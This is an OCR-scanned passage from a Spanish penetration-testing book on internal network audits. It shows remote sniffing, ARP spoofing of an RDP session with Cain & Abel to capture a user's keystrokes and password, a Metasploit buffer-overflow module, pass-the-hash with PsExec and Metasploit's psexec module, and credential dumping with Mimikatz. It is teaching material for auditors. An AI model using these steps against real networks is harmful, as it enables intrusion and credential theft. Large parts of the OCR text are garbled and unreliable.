-  Maquina  A:  Maquina  de  la  que  ya  se  tiene  el  control  y  se  configura  un  sniffer  de  red  para 
que  el  usuario  victima  sea  snifacio  sin  saberlo. 

-  Maquina  B;  El  auditor  controlara  en  todo  momento  el  trafico  de  la  maquina  A  desde  esta 
maquina. 


En  primer  lugar,  y  suponiendo  que  el  auditor  dispone  del  control  de  la  maquina  remota.  se  debe 
configurar  la  herramienta  rpcapd.exe.  _ _ 


C:\Pr09ran  Files\WinPcapyrpcapd.exe  -h 
“rScapd  t-b  <addrcss>]  t-p  <host,port» 

-b  Ld^;eL^r^brfid^;ls^L^^b^^d^;^  numeric  or  literal. 

^DefLlt:  it  binds  to  port  2002 

-p  <port>:  the  port  to  bind  to  Default.  [‘„g^;'^"|tin/sockets  are  used) 

file^tilt  Kee^s  t||e  lxst  of  tbe  hosts  uhicb  are  all^^ 

S“e  to  ^:iLrjln^^rad“ol'niLric  ones)  in  order  to 

avoid  problens  with  different  «<^fress  fanilie..^ 

is  Started  from  the  control  panel 

-s  <file>:  save  the  current  configuration  to  t iie  switches 

-f  <file>:  load  the  current  configuration  from  file,  all  the  switciies 

specified  from  the  command  line  are  ignored 
-h:  print  this  help  screen - - 


Fig.  3.42:  Listado  dc  opcioncs  dc  rpcapd.exe. 


Para  lanzar  la  herramienta  capturando  el  trafico  y  que  la  herramienta  esctiche  en  cieilo  puerlo  sc 
debe  configurar  de  la  siguiente  manera  rpcapd.exe -n  -p  <pLierio>. 

La  opcion  n  indica  que  no  habra  autenticacidn,  intcresantc  para  el  alacante. 

El  auditor  por  lo  tanto  debera  abrir  Wireshark  e  ir  a  la  siguiente  pestana  Capwre  ->  Inteffices  -> 
Options  ->  Manage  Interfaces  ->  Remote  Interfaces. 
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IS  Wireshark;  Remote  I...  |-  cj  ||  a  ||..R^I 

Host 
Port 

-Authentication - — — 

O'  Null  authentication 
O  Password  authentication 
Username: 

Password; 


- - - 1 

OK 

Cancel 

Fig.  3.43:  Conexion  a  rpcapd.exe  a  traves  de  Wireshark. 


LI  trafico  se  visualiza  en  la  pantalla  principal  de  la  heiramienta  como  si  estuviera  siendo  capturado  a 
traves  c  e  una  mterfaz  local  de  la  maquina.  Esta  prueba  de  concepto  es  realmente  interesante  ya  que 
se  puede  utilizar  en  distintos  entomos.  ’ 

Existen  otras  formas  de  reenviar  trafico  de  una  maquina  a  otra  a  traves  de  sniffers  remotos,  incluso  el 
pay  oad  Meterpreter  disipone  de  un  modulo  denominados77///er  con  el  que  se  puede  .S7?/;7rw  el  trafico 
de  la  maquina  comprometida  eon  el  payload. 


Satori  y  pOf  herramientas:  sniffer  pasivo 

Satan  es  otra  de  las  herramientas  que  se  pueden  denominar  imprescindibles  en  bastantes  auditon'as 
reahzar  A«ge/-/;/7/7r//7^  pasivo  a  las  maquinas  que  comparten  la  red  con  el  equipo  del 

,\Que  es  el  fingerprinting  active  y  pasivo?  ,-,Cual  es  su  diferencia?  Es  sencillo.  el  primero  se 
caiactenza  porque  el  atacante  realiza  alguna  accion  directa  que  provoca  una  respuesla  de  la  victima 
niientras  que  por  otro  lado  el  pasivo  se  limita  a  escuchar  el  trafico  y  analizar  los  paquetes  de  una  red' 

En  el  segundo  tipo  de  fingerprinting  se  puede  entender  que  la  maquina  del  auditor  pasa  totalmente 
dcsapereibido,  solo  se  escucha  trafico  sin  realizar  accion  directa.  Tambien  hay  que  recalcar  que  la 
t  quina  del  auditor  se  dara  cuenta  solo  de  lo  que  pasa  por  su  tarjeta  de  red. 

La  herramienta  Nmap  permite  realizar  un  fingerprinting  activo,  mientras  que  Satori  realiza 

lhwpnl''^r"‘'”^  pasivo.  La  deteccion  de  sistemas  operativos  se  puede  dar  tanto  con  un  tipo  de 
WJgGi printing  como  con  la  otra.  ^ 

ninaS'mir’  ^  no  genera 

que  se  re  consiga  los  objetivos  propuestos.  porque  el  trafico  de  la  maquina 

eqiiieie  no  llega  a  la  tarjeta  de  red  del  auditor. 
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Select  your  capture  source 


You  can  capture  packets  from  a  network  interface  or  load  them  from  a  file. 
Choose  your  destiny ;] 


(•)  A  network  device : 

O  A  f'Is  • 

O  Raw  device  name 


Realtek  PCle  GBE  Family  Controller 


captures^ 


\DeviceSNPFj74S7A4F2-408E-480E-81M-3698^2a 


Additionaly,  you  can  specify  a  capture  filter  (tcpdump  filters  are  supported) _ 

Capture  filter : 


□  Do  Capture  on  Live  Connection? 

I21  Debug  Capture  on  Live  Connection? 


Ok 


Cancel 


Fig.  3.44:  Seleccion  de  iiiierfaz  cn  Satoh. 

La  fuerza  de  este  tipo  de  herramientas  esta  en  los  modules  que  implementan  y  que  se  pueden  anadir. 
Una  d  afeosas  que  mejor  realiza  Satori  es  la  dcteccion  del  ststema  operaUvo  en  las  maquu  as 

e^:;lndotraficoluared.Laherramientaanalizaelcomportamientodelosp^^^^^^^^^^^ 

alrededor  de  la  maquina  del  auditor,  los  modulos  realizan  la  interencia  de  ciertas  ^opiedades. 
P^otollL  SNMP.  CDP,  SMB.  SCCP.  HSRP,  TCP.  ICMP,  EIGRP.  OSPF,.^c.t... 


addfees 
172.1S.10.47 


DMS 


L 


1 72.1  B.11 .227 
80.31  79.37 


First  Seen  Last  Seen 

11:1 8.04  ene.  1 6  201 4  11  -.27.45  ene  1 B  201 4 


iiaw  7  i^;a7.42ioe.:16  2914; 


1 1  ;1 8. 04  ene,  1 6  201 4  1 1  ;27  22  ene.  1 6  2U1 4 
1 1:1 8.05  ene.  1 6  201 4  11  ;27.1 8  ene.  16  201 4 


Mac  address 


Macveridor  TTL  Hop; 

I  Idictosofl  Corporal!. . .  128  0 


Fig.  3.45:  Captura  con  Satori. 

Otra  herramienta  que  realiza  fingerprinting  pasivo,  y  es  totalmente  recomendable  para  este  tipo  de 
iJabaj  “o/;  eL  herramient;  se  puede  encontrar  en  la  siguiente  URL  http:tam/.cof.r/.«f/t. 

cx/p()f3/. 


1.2.3. 

4,1524  ->  4.  3. 2.1,  SO  (syn)  ]- 

;  client 

=  1.2.  3.4 

'  05 

=  v;indQv.‘s  xp 

,  diit 

=  S 

paranis 
i  raw_sig 

=  4*?120+S; 0:14 52; 65535,0; mss  .rop . nop . sok; df .  1  d+ ;0 

Fiu.  3.46:  Resultados  d&pOf. 


Pintar  trafico  de  red 

Puede  sercomodo  en  algunas  ocasiones  realizarvisualizaciones  graficas  de  los  distintos  entomos 

S  Tue  Taudi  Js=  encuenrre.  E„  alguna,  ocasiones  la  frase  -  r„l.  aids dangea  ,«e  »< 


Capitido  Hi  Confeccionando  e!  atcique 


palahras  se  aplica  a  los  archivos  PCAP  o  CAP^  y  visual izar  en  un  esquema  o  mapa  puede  ayudar  a 
entender  mejor  lo  que  esta  ocurriendo  en  la  captura  de  trafico  realizado. 

Herramientas  como  iNav,  InetVis  o  NetGrok  pemiiten  realizar  mapas  de  manera  muy  sencilla, 
incluso  capturando  el  trafico  directamente  desde  la  interfaz  de  red.  Logicamente,  el  estiidio  de  las 
tramas  en  archivos  PCAP  o  CAP  sera  mas  eficiente  y  util,  pero  echar  un  vistazo  a  lo  que  se  presenta 
con  estas  heiTamientas  es  realmente  interesante. 


Immunity  Stalker 

Esta  heiTamienta  no  es  recomendable  para  auditorias,  pero  si  es  un  servicio  totalmente  llamativo,  ya 
que  esta  solucion  permite  automatizar  el  analisis  de  capturas  de  trafico  para  buscar  dates  importantes, 
mostrando  en  un  panel  de  control  toda  la  informacion  descubieita. 


Stalker  analiza  capturas  PCAP  sin  problema  de  manera  automatizada,  por  lo  que  si  se  realiza  alguna 
captura  de  trafico  local,  o  incluso  se  obtiene  alguna  captura  mediante  el  uso  de  algiin  buscador  en 
Internet,  se  puede  utilizar  el  servicio  para  procesarla  y  visualizar  los  dates  interesantes  obtenidos. 

Stalker  permite  subir  datos  en  diferentes  formatos,  y  los  va  analizando  mediante  la  ejecucion  de 
procesos  en  paralelo,  por  lo  que  se  puede  clegir  seguir  trabajando  mientras  se  analizan  los  datos.  Una 
vez  se  ha  terminado,  cada  nuevo  host  descubierto  tendra  una  representacion  con  el  numero  total  de 
paquetes  en  los  que  aparecia  dicho  equipo.  Tambien  se  mostraran  los  datos  analizados. 

<.\0ue  tipo  de  informacion  obtiene  Stalker?  Pues  infonnacion  sensible  en  algunos  casos,  como  se 
podria  obtener  mediante  el  uso  de  otras  herramientas  manuales,  por  ejemplo  conversaciones  cn 
redes  sociales  o  chats,  usuarios.  conli'asenas,  cookies,  etcetera. 

(^,Poi  que  no  usarla  en  auditorias?  La  respuesta  es  sencilla,  LOPO.  Esta  ley  va  en  contra  de  este  uso 
de  herramientas  para  cstos  temas  sensibles,  ya  que  la  informacion  queda  o  podria  quedar  alojada  en 
los  hosts  de  Stalker. 


PoC:  Obtencion  del  primer  dato  de  interes 

En  esta  prueba  de  conceplo  partimos  del  conocimiento  breve  que  ticne  el  auditor  sobre  la  red  y  la 
configiiracion  de  esta,  una  vez  que  ha  iitilizado  hen'amientas  y  tecnicas  para  visualizar  que  tiene 
alrededor  y  sobre  que  tiene  conectividad. 

Es  muy  importante  que  siempre  se  debe  tener  en  cuenta,  y  es  que  siempre  tendremos  conectividad. 
como  empleado,  con  el  DC,y  por  lo  tanto  si  el  auditor  se  apodera  de  dicha  maquina  se  podra  acceder 
a  todos  los  rincones  de  la  red  Microsoft. 

Una  de  las  circunstancias  mas  dificiles  es  encontrar  lo  que  se  denomina  el  primer  dato  de  interes,  la 
primera  cuerda  de  donde  poder  tirar  para  logi*ar  empezar  a  movemos  por  la  red,  y  poder  llegar  a  otras 
ubicaciones  a  las  que  al  principio  no  se  podia  llegar. 
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Teonaypracncaparakn;^^ 


1  •  Ao,^n'^'A\'y  No  existe  una  respuesta  clara y  concisa,  pero 

que  el  auditor  se  encuentre. 

A  co„.i„uac.6„  s.  muestra  a„  listadc  de  opcionas,  aunpa.  ax.s.en  ouas  ™a„am  pertec,a.=„.a 
co^o  ae  ™„clo„P  an  a,  -escu.n™iaa.o  da 

web,  alguna  autanticaaion  SMB.  alguna  ,  |  ^  q^g  cireala  por  el  entorno. 

rfotrlrrrrl-.  paao^aa  a,a„o  pea  e„  algaaaa 

e,ap,eaaa  se  paedea  ““"‘““r  ejempio  ARB  Spoofi.R  o  lVe,g«„, 

-  Realizacion  de  tecnicas  Man  In  -  ’  jp,,4  ^  iPv6.  Si  la  organizacion  no 

Spoofing,  dependiendo  si  se  quiere  hacer  P  ^  deshabilitado  intemamente  puede 

tiene  una  politica  en  la  que  d.spongan  del  P™  por  IPv6.  En  muchas 

ser  un  buen  vector  de  ataque,  forzar  comumca  Iqs  elbctos  de  uu  ataque  Man  In 

organizaciones  existen  medidas  para  contrarrestar  o  miUgai 

The  Middle.  1  1  ^c  rf>Qiiltados  obtenidos  en  auditorias 

-  La  evaluacion  de  otras  pruebas,  por  pueden  aportar  credenciales  que 

perimetrales  o  en  los  APT  que  hayan  podido  reabza.sc,  pued  p 

podrian  ser  utilizadas  por  los  ^en  akun  sofnvare  es  uno  de  los  vectores  a 

-  La  explotacion  de  alguna  vulneia  i  i  actualizadas,  pero  entre  que  una 

estudiar  claramente.  Las  organizaciones  medidas  puede  transcLirrir  un  tieinpo. 

vulnerabilidad  se  descubrc  y  la  no  se  tiene  la  misma  seguridad 

Adenaas,enentonrosintemosdetrabajo.en  muchas  ^  ^ 

que  en  produccion  o  P'^^fP™^ ^  en  versiones  antiguas,  tanto  de  sistemas 

:;s:“pS:ne:  rr: ^rs  .n,p««s«.es  pe™  p.™iu.„  ^ 

[  oira  via  es  la  ingenicrla  social, 

pero  es  una  tota'.mente  valida. 

A  continuacion  se  ejemplifica  una  de  las 

entre  dos  equipos.  un  cliente  y  un  s  equipos  son  antiguas.  El  auditor  fijari 

cuenta  que  las  versiones  de  "P^"  ■  servidor  es  un  Window.^  Sen’er  2000.  iPor  qu 

Cain  &  Abel  tiene  muchas  funcionalidades  que  visualizar  comunicaciones 
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servidor.  Se  sabe  que  si  la  version  del  protocolo  RDF  es  v5,  se  puede  realizar  un  downgrade,,  el  cual 
la  herramienta  Cain  S.  Abel  realizara  autoniaticainente. 


Fig.  3.47:  Reali7.ando.vc-fl;7^i?A 


/\ctivando  el  sniffer  en  Cain  &  Abel,  cox\  el  segundo  icono  de  la  barra  superior  y  despues  yendo  a  la 
pcslana  llamada  Sniffer.  Se  debe  realizar  un  .scan  ARP  de  la  red,  para  visualizar  los  dos  equipos,  el 
cliente  y  el  seividor. 


1^  Decoders  Network  |igt  Sniffer  Cracker  Traceroute  llffl  CCDU  T'A”  Wireless  IgVi  Query 

©m 

S  APR-Cert 
^  APR-DN5 
ea  APR-55H-1  (0) 
APR-HTTP5(0) 

^  APR-RDP  (0) 
li  APR-FTP5(0) 
til  APR-POP3S(0) 

1§  APR-IMAP5(0) 
i  APR-LDAP5(0) 
il  APR-5IP5(0) 

_ 

1  IP  address  MAC  address  1  Packets ->  <- Packets  ImaCc 

Status  1  IP  address  |  MAC  address  |  Packets  ->  |  <-  Packets  |  MAC  e 

@  Configuration  /  Routed  Packets  | 

1.®  APR  pijf  Routing  | Passwords  VoIP  | 

Fig.  3.48;  Cain  &  Abel  y  su  flincionalidad  de  spoofing. 
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Una  vez  se  disponen  de  los  equipos  en  pantalla.  se  debe  ir  a  la  segunda  pestana  de  la  ban'a  de  abajo, 
d  “omhi  Aho™  se  dY  pulsar  sobre  el  bo.6„  eon  un  par,  selecconar  los  epu.pos  ,ue 

se  quieren  envenenar. 


*  ♦  CHHU  CHHLL 

i^— ^  uC)  HTLM  5PDDF  SPDDf 

a®  v!y  ftUTH  reset  htlh 

Decoders  |  Network 

JMl9  Sniffer  1#  Cracker 

(sa  APR 

Status  IP  addre! 

,.{a  APR-Cert 

APR-ONS 

B  APR-SSH-1  (0) 
APR-HTTPS(0) 
APR-ProxyHTTPS  (0) 

.  APR-RDP  (0) 

.,i)  APR-FTPSCO] 

Fig.  3.49:  Adicion  dc  equipos  para  spoofear. 

Para  eornpletar  el  sc  debe  pulsar  el  rcrcer  bolon  de  la  barra  superior,  el  C|ue  se  eneuemra 

ala  deY.  del  b„',dnV.„,l(rer.  Ahon,  loea  esperar  pu.  el  usuario 
conexion  RDP  con  la  maquina  servidor.  Se  ha  comentado  que  paia  c  j  p  P 

cliente  dispone  de  un  sistema  operativo  Windom  AT,  el  servidor  es  Windows  Sen’er  .000  y  quc 

version  del  protocolo  RDP  es  v5. 

Cuando  el  usuario  inicia  la  conexion  de  escritorio  remote  le  aparecera  la  pantalla  de  /ogm  conic 
SirdoYYormal,  Bl  usuario  se  losu.o  y  dispone  de  la  eones.on  ““"d 

conexion  ha  estado  circulando  a  traves  de  la  maquina  del  auditor,  y  Cam  &  Abel  ha  ical  zado 
S Yro*  del  pronnrolo,  de  la  .eorion  5  a  la  4.  la  cual  se  puede  ext.-aer  Inlorm.oon  sensible  eonro 
las  pulsaciones  de  teclado  que  ha  realizado  el  usuario. 


;  ta 


'll  + 


1  'J  I  “W  1  AWIH  »tStT  niLn  |j  -  —  _ _ _ _ _  ^ 

life  \C/  cracker  Iffl  Tracepout.  |P  CCDU  I'T  -AArete.. 

_ _ ^  I  '  ■  I  orSD  ear\/»r  I  CilBflt  I 

Started 


APR 
,  {^APR-Cert 
APR-Df'5 

m  APR-55H-1  (0) 
g  APR-HTTPSCO) 
^  APR-RDP  (0 
if)  APR-FTP5(0) 
ill  APR-POP3SCO) 
I  APR-IMAPS(O) 
I)  APR-LDAPS(O) 
I)  APR-5IP5  (0) 


Remove  Delete 
Remove  AB 


Fig.  3.50:  Fichero  dc  te.xio  donde  se  almacenan  las  acciones  de  la  victima. 

Si  el  auditor  abre  el  fichero  puede  visualizar  en  hexadecimal  todo  el  ^ 
servidor  del  protocolo  RDP.  Se  puede  visualizar  que  el  algoritmo  de  cifrado  que  ut 

sabiendo  ,ue  es.a  compronrerido  se  puede  recuperar  la  infonnac.on  en  piano,  Ahora. 


135 


Capitulo  III.  Confeccionando  el  ataqiie 


abre  una  consola  o  and,  y  se  ejecuta  la  instruccion  type  <Jichero  rdp  texto>  \fuidstr  "Key  y  de  esta 
forma  se  puede  filtrar  del  fichero  las  pulsaciones  de  teclado. 

En  resumen,  si  el  usuario  victima  ha  iniciado  sesion  estando  envenenado  por  el  auditor  y  la  version 
de  RDP  es  vulnerable,  Cain  &  Abel  proporcionara  en  un  fichero  de  texto  las  pulsaciones  de  teclado 
que  ha  llevado  a  cabo  la  victima. 


:):\PFogranj  Files\Cain\RDP>tvpe  RDP-201  L2514528177.txt  !  findstr  ''Key” 
-  Seruer  RC4  Key  size:  2  <:i28-hil:>  ^ 

Keif  pressed  client-side:  0x17  -  ^  i^ 

^ey  released  client-side:  0x17  -  ^  i^ 

(ey  pressed  client-side:  0x19  -  ^p^ 

{ey  released  client-side:  0x19  -  ^p^ 

^ey  released  client-side:  0xle  -  'a" 

{ey  pressed  client-side:  0xf  -  "tabulae ion' 

<ey  released  client-side:  0xf  -  "tabulae ion" 

{ey  pressed  client-side:  0x17  -  "  i" 

<ey  released  client-side:  0x17  -  "  i" 

(ey  pressed  client-side:  0x19  -  "p" 

(ey  released  client-side:  0x19  -  "  p" 

<ey  released  client-side:  0xle  -  "a" 

(ey  pressed  client-side:  0x25  -  "k" 

(ey  released  client-side:  0x25  -  " 

(ey  pressed  client-side:  0x2  -  "1" 

(ey  released  client-side:  0x2  -  "1^ 

(ey  pressed  client-side:  0x25  -  "k" 

(ey  released  client-side:  0x25  -  "  k" 

(ey  pressed  client-side:  0xb  -  "0" 

(ey  released  client-side:  0xb  -  "0^ 

(ey  pressed  client-side:  0x7  -  "6" 

(ey  released  client-side:  0x7  —  "6"^ 

(ey  pressed  client-side:  0x2  -  '1" 

(ey  released  client-side:  0x2  -  "1"" 

(ey  pressed  client-side:  0xlc  -  "entrar" 

(ey  released  client-side:  0xlc  -  "entrar" 

(ey  pressed  client-side:  0xlc  -  "entrar" 

(ey  released  client-side:  0xlc  -  "entrar" _ 

Fig.  3.51 :  Obtencion  de  credcncial  de  usuario  de  escritorio  remoio. 


Como  se  puede  visualizar  en  la  imagen.  parece  que  el  usuario  tiene  como  nombre  ipa,  y  despues  tras 
puLsar  en  el  tabulador  parece  que  ha  introducido  la  contrasena  ipaklk061.  Aqui  sc  ha  obtenido  una 
credencial  por  la  que  al  menos  se  podra  acceder  al  equipo  sei-vidor  donde  cl  usuario  se  ha  conectado. 


I  ,  .  ,  *  r  -I - I- - - jv- 

nablara  de  exploiting,  gracias  a  versiones  antiguas  o  no  actual izadas  de  sei-vicios.  productos  o 

sictf'moc 


sistemas  operativos. 


Una  opcion  valida  sen'a  utilizar  automatizacion  para  realizar  estas  pruebas,  aunque  en  muchas 
ocasiones  es  el  conocimiento  de  los  ultimos  expedientes  y  vulnerabilidades  de  seguridad  la  quc 
olorga  al  auditor  el  exito.  En  otras  muchas  ocasiones  son  los  productos  menos  conocidos  y  en 
entornos  no  importantes  los  que  pueden  presentar  vulnerabilidades  imporlantes,  las  cuales  pennitan 
ejecutar  codigo  arbitrario  en  la  maquina  remota,  con  lo  que  el  auditor  ya  conseguira  acceso  a  la 
•tiaquiiid  y  podra  ganar  privilegios  o,  al  menos,  acceso  a  otra  ubicacion. 


3”E  •ir:,’'T0‘sl°i,t.no»>. 

80/tcp  open  http  (nini^ttpa  i.±t 
rtftC  Address:  .84.1B 


E„  „.e  escenario,  similar  ,1 ,»  sa  ^STon^l’d:  ^ 

SvTd"— o  »  ""  P’^'P”  <*=' 


Para  ello  se  debe  ejecular  la  instruccion  search  <palrdn  de  busqueda>. 


Successfully  loaded  plugin:  pro 
>  search  mini_htrpd 


Matching  Modules 


Disclosure  Date 


Rank  Desi 


Name 
ription 


'  expi  oic/window3/iitt;p/-altraminihcr;p__bof 

Mini  .HTTPD  Stack  Buffer  Overflow 


2013-07-10  00:00:00  UTC  normal  Olt 


msr  >  I 


Fig.  3.53:  Busqucda  de  exploits  con  msfcoiisole. 

,  mddulo  da  Mcasploi,  solo  » 


vulnerable,  oblener 
como  payload. 


Los  modulos  que  no  requieren  interaccion  por  llegar  a  lanzar 

que  se  puede  saber  si  el  equipo  reinoto  que  se  quieie  explotar 


el  exploit. 


Capitulo  III.  Cotifeccicmando  el  ataque 


msf  >  use  exploit /windows/ http/ult-raminihttp  bof 
msf  exploit (  ^  ')  >  show  options 


Module  options  (exploit/windows/http/ultramlninttp  bof) ; 
Name  Current  Setting  Required  Description 


Proxies 

RHOST 

RPORT 

^/HOST 


no 

yes 

yes 


no 


Use  a  proxy  chain 
The  target  address 
The  target  port 
HTTP  server  virtual  host 


Exploit  target : 

Id  Name 

0  vl.21  -  Windows  XP  SP3 


msf  exploit ( 
RHOST  => 
msf  exploit ( 


L.123 


')  >  set  RHOST 

)  >1 


123 


Fig.  3.54:  Configuracion  de  modulo  do  Meianploii. 


PoC:  Pass  The  Hash  (PtH  Attack) 


La  tecnica  conocida  como  Pass  the  Hash  o  impersonalizacion  de  usuarios  proporcionara  al  auditor 
la  posibilidad  de,  conocido  el  hash  de  la  contrasena  de  un  usuario.  acceder  a  los  recursos  de  dicho 
usiiario  en  otra  maquiiia. 


No  es  neccsario  conocer  la  contrasena  y  este  hecho  hace  que  un  ha.sb  de  usuario  de  Windows  sea 
realmenle  importantc.  Logicamente,  para  acceder  a  dichos  recursos  el  usuario  debe  tener  pemiisos 
en  dichas  maquinas.  Si  se  vulnera  una  maquina  y  se  obtiene  el  hash  del  usuario  administrador 
es  muy  probable  que  se  pueda  acceder  a  oiras  maquinas,  ya  que  los  adminislradores  de  dichas 
maquinas  siielen  tener  la  misma  credencial. 


En  definitiva.  la  impersonalizacion  persigue  la  manipulacion  de  los  datos  de  autenticacion  en  un 
sistema  operative  Windows.,  con  el  fin  de  acceder  a  otras  maquinas  que  dispongan  de  un  mismo 
usuario  con  un  mismo  hash,  es  decir  la  misma  contrasena,  que  en  la  maquina  de  la  que  se  pane. 


Aconlinuacion  se  ejemplifica  sugiriendo  el  siguiente  escenario; 


I 


-  Una  vez  obtenido  el  primer  dato  de  interes,  se  supone  que  el  auditor  ha  accedido  a  una 
maquina  y  obtenido  los  hashes  de  los  usuarios  de  esta. 
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.  se  „.ili.ar4n  los  W..  pa.,  -liaar  i,„p.,sonalizaci6n  da  dichos  usaarios  y  p.K>=, 

acceder  a  otras  maquinas. 

Hay  que  tener  claro  que  si  en  el  acceso  ^  u  horizontal.  Si  por 

el  que  el  auditor  se  encuentra,  este  se  encoi  ^  identidad  esta 

el  contrario,  el  auditor  con  la  impersona  movimiento  vertical.  Mediante  PtH  tamblen 

r r  re=ente  i.ual  que  un  usuario  de  .upo 

de  trabajo. 

•  t^irnira  Dor  uii  lado  csta  Windows 

En  este  ejemplo  se  mostraran  dos  Metasploil.  Es  interesante 

Crer/errt/./£^//oroPFC£,yporotroladoseencuenrae^^^^^ 

obtener  el  hash  de  un  administrador  porque  se  podia  utdiza.  lecursos 

Por  otro  lado,  tanrbien  se  puede  utilizar  hen-ainientas  co.no  FSToois  de  Sysl.ternais  para  ejecutar 
procesos  en  remoto  con  dichas  credenciales,  por  ejemplo,  una  M  . 

'  •  r^nn  p1  naranietro  ~  / SC  puede  listai  las  credenciales 

rcquiera  credenciales  de  H'7/?r/mv.v. 

antes  de  los  es  el  hash  LM  y  la  parte  de  la  derecha  el  hash  NT. 

En  la  imagen  se  puede  visualizar  como 

memoria  con  la  siguiente  mstrucc.on  uce.e.rc  s  <asmno 

Username:  pablo 

Si': 

3?LM  credentials  successfullv  changed*  _ J 

Fia.  3.55:  Moilificacidn  de  credenciales  en  nifiiioiUt 

En  este  instante  el  auditor  se  autenticara  contra  el  a  los 

pablo.  Por  ejemplo,  si  accede  a  traves  de  ^  ^piicaciones  a  traves  de  SMB  con 

modulo  p.Tevcc  de  Metasploit,  el  cual  se  utihzara  mas  adelante. 


Capitiilo  III.  Confecclonando  el  ataque 
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C:N>PsExec -exe  \\192 -168 .1 .18  end-exe 

PsExec  vl-98  —  Execute  processes  renotelii 
Copyright  CO  2001—2010  Mark  Pussinooich 
Sysinternals  -  vniw-sys internals -com 

Microsoft  V/indows  [Uersion  6.1.76003 

Copyriglit  <c>  2009  Microsoft  Corporation.  Reseruados  todos  los  dereclios 

C :  \ W  in  do  ws  Ss  ys  t  e  m3  2  >m  e  r 

Microsoft  Windows  CUersion  6.1.76003 

C:\Windows\sostem32> _ _ 

Fig.  3.56:  Ejecucion  dc  una  5//£?// remota  con  psexec. 


Y  por  supuesto,  como  se  ha  conientado  anterionnente,  incluso  se  podn'a  optar  por  un  entoino  grafico 
para  visualizar  la  informacion  desde  el  explorador  de  archivos,  tal  y  como  se  puede  visualizar  en  la 
imagen. 


.Si  se  tiiviera  un  ha.sh  de  un  administrador,  ya  fuera  local  o  de  dominio,  se  podn'a  acceder  a  una  gran 
cantidad  de  recursos  y  realizar  desplazamientos  verticales.  El  recurso  CS  es  administrativo  por  lo 
que  cualquier  usuario  no  podra  acceder  a  el.  Hay  que  tener  en  cuenta  que  si  sc  tuviera  un  hash  de 
administrador  de  dominio,  la  auditon'a  interna  tocaria  a  su  fin,  ya  que  se  lendria  acceso  a  todo. 

Ahora.  se  e.xplica  como  I'unciona  el  modulo  de  Meta.splnit  para  autenticar.se  a  traves  de  SMB  con 
hashes,  e  incluso  con  las  contrasenas  en  piano  si  se  tuvieran,  y  poder  ejecutar  un  pm-loacL  por 
ejemplo  una  Meievpreler  en  cl  equipo  remoto.  Realmentc  este  modulo  no  es  un  exploit,  ya  que 
realmente  cl  auditor  se  autentica  con  los  hashes  que  ha  obtenido  previamente,  pero  lo  interesante  es 
que  permite  cJecutai7;m’/o«r/i'  muy  utiles. 

U  nita  del  exploii  para  impersonal izar  se  encuentra  en  e.xploit/window.s/SMB/psexec.  Este  modulo 
'spone  de  variables  que  se  especifican  a  continuacion: 
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Atributo 

Descripcion 

RHOST 

Direccion  IP  de  la  maquina  a  la  que  se  quiere  conectar  paia  impusoiidb/ai 

un  usuario 

SHARE 

Recurso  al  que  se  quiere  conectar 

SMBDouiain 

Dominio  para  la  autenticacion 

SMBPass 

Passwords  formato  hash  <LMHASH>:<N TLMHASH> - - - 

k^lwAAAJL 

SMB  User 

Usuario  al  que  se  quiere  impersonalizar - - - 1 

Module  options  (exploit/windows/smb/psexec) : 

Name  Current  Setting  Required  Description 


The  target  address 

Set  the  SMB  service  port  .  /.nMTwt 

The  share  to  connect  to,  can  be  an  admin  share  (ADHIN$, 


RHOST 

RPORT  445  yes 

SHARE  ADMINS  yes 

CS,...)  or  a  "  %he  Windows  domain  to  use  for  authentication 

WORKGROUP  no  password  for  the  specified  username 

no  The  username  to  authenticate  as 


SWBDomain 

SMBPass 

snBUser 


Exploit  target: 

Id  Name 
0  Automatic 

tnsf  exploit (psexec)  >  set  RHOST  192.168.1.37 

S..  »6P.«  .735172c3.7;i2c6..«b«Sb51««.:5Ub99..9M7C31.558!c.f„S«. 

lS.Si.>  8735172C3.77a2«..d3»433b5UM..,517b99909997c3b55.8c.t..9c..b9«9 

rasf  exploit(psexec)  >  set  SHBUser  administrador 
SHBUser  =>  administrador 
msf  exploit  (^psexec)  > 


Fig.  3.58:  Configuracion  del  modulo 

Para  ejecutar  la  autenticacion  y  ejecucion  del  payload  se  requiere  lanzar  el 

del  mMulo.  Estas  dos  hen-amientas  que  se  han  estudiado  son  muy  utiles  en  las  aud.tonas 

intemas,  y  junto  al  pivoting  aportaran  un  alto  porcentaje  de  exito  en  el  pioceso. 


PoC:  Escalada  de  privilegios 

En  el  instante  que  se  accede  a  una  nueva  maquina.  sea  por  la  tecnica  que  sea.  es  "itei^sanle  ea 
La  exploracidn  del  equipo  en  busca  del  inaxinto  de 

descubrimiento  de  red  para  vigilar  los  nuevos  equ.pos  y  segmentos  de  red  los  que  p 
A  continuacion  se  propone  un  procedimiento  a  realizar. 
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-  Configuracion  de  red.  Se  pucde  descubrir  nuevas  redes  directamcnte  en  la  configuracion 
del  adaptador  o  analizar  el  trafico  que  circula  por  los  posibles  adaptadores  de  red  encontrando 
nuevas  maquinas  con  las  que  no  se  disponia  conectividad  y  que  pueden  ser  criticas. 

-  Volcado  de  usuarios  almacenados  en  la  SAM.  Si  la  maquina  fiiera  un  Domain  Controller 
se  podria  obtener,  siempre  y  cuando  se  tuvieran  privilegios,  un  volcado  de  usuarios  del 
dominio,  con  lo  que  la  auditoria  interna  de  red  acabaria  ya  que  se  obtendria  acceso  completo. 
Con  estos  usuarios  se  podria  realizar  impersonalizacion  {PtH)  de  estos  en  otras  maquinas 
WindoM^s  de  la  red.  El  modulo  de  post-explotacion  para  volcar  los  usuarios  de  un  Domain 
Controller  es  post/windows/gather/smartjiashdump. 

-  Informacion  global  de  la  maquina,  mediante  la  ejecucion  de  scripts  como  scraper  o 
winenum  de  Metasploit. 

-  Utilizar  la  maquina  vulnerada  como  pivote  para  disponer  de  conectividad  con  otras 
maquinas. 

-  Biisqueda  de  credenciales  cacheadas  en  la  maquina  mediante  la  utilizacion  de  heiTamientas 
como  Mirnikatz  o  WCE  en  la  maquina  remota. 

Ya  se  ha  estudiado  tecnicas  para  obtener  el  primer  dato  de  interes  con  el  que  ir  sacando  informacion 
e  ir  moviendosc  por  la  organizacion.  Tambien  hay  que  tener  en  cuenta  que  una  vulnerabilidad  en 
un  software  tambien  puede  pennitir  al  auditor  escalar  privilegios.  A  continuacion  se  hablara  de 
herramientas  que  permitiran  escalar  privilegios  gracias  a  los  sistemas  Windows.  La  hen-amienla 
Mirnikatz  pennite  al  auditor,  siempre  que  tenga  permisos  en  la  maquina.  realizar  las  siguientes 
acciones: 


-  Volcado  de  hashes  de  los  sistemas  Windows. 

-  Exportacion  de  certificados,  incluso  los  no  exportables. 

-  Manipulacion  de  procesos. 

